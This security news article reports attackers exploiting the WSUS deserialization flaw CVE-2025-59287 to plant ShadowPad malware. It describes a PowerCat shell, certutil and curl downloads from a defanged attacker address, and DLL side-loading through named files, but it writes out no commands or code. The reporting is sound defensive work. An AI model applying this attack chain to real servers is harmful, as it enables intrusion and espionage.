Microsoft WSUS Vulnerability Exploited to Spread ShadowPad Malware
Recently, a significant security vulnerability in Microsoft Windows Server Update Services (WSUS) has been discovered to be a target for cybercriminals deploying ShadowPad malware. This exploit leverages the CVE-2025-59287 flaw, enabling attackers to gain unauthorized access to systems running WSUS.
Understanding the Vulnerability
CVE-2025-59287 pertains to a critical deserialization vulnerability within WSUS that can lead to remote code execution with system privileges. Microsoft patched this vulnerability last month, but since then, it has been heavily exploited by malicious actors. According to a report by the AhnLab Security Intelligence Center (ASEC), attackers are specifically focusing on publicly exposed WSUS instances to gain initial access and perform reconnaissance actions.
Shadows of Espionage: The ShadowPad Malware
ShadowPad isn’t just any piece of malware; it’s identified as a successor to the well-known PlugX backdoor and has been an essential tool for state-sponsored hacking groups, particularly from China, since its emergence in 2015. Security experts at SentinelOne described it in a past analysis as a “masterpiece of privately sold malware in Chinese espionage.”
Once attackers exploit the CVE-2025-59287 flaw, they employ PowerCat, an open-source PowerShell-based utility, to create a system shell (CMD). Following this initial access, they use command-line tools such as certutil and curl to download and install ShadowPad onto the compromised server.
The Mechanics of the Attack
The attacks documented reveal that adversaries are leveraging the deserialization flaw to execute Windows utilities like curl.exe and certutil.exe. These utilities are employed to connect to an external server, specifically “149.28.78[.]189:42306,” which is used to facilitate the malware download.
ShadowPad is activated through a process known as DLL side-loading. It essentially utilizes a legitimate binary, “ETDCtrlHelper.exe,” to execute a malicious DLL payload, “ETDApix.dll.” This payload acts as a memory-resident loader, thus allowing the malware to function undetected.
The Functionality of ShadowPad
Once installed, ShadowPad launches a core module that is responsible for loading additional plugins directly into memory. This design not only makes it versatile but also equipped with numerous anti-detection and persistence techniques. ShadowPad enhances its stealthy operations through a series of sophisticated methods that help it avoid security measures.
Implications of the Exploit
Following the public availability of a proof-of-concept exploit for CVE-2025-59287, the speed at which attackers were able to weaponize this vulnerability reflects the potential severity of the issue. As AhnLab highlighted, this vulnerability is particularly alarming due to its capability to facilitate remote code execution with system-level permissions. This significantly raises the stakes for organizations exposed to this threat.
As organizations continue to implement and rely on WSUS for updating their systems, the urgency to address this vulnerability is paramount. Regularly updating and securing these services is critical not just for protecting against ShadowPad, but for overall cybersecurity hygiene.
By understanding the nature of the vulnerability and the tactics employed by malicious actors, organizations can adopt more effective defensive measures to safeguard their systems and sensitive data against potential breaches.
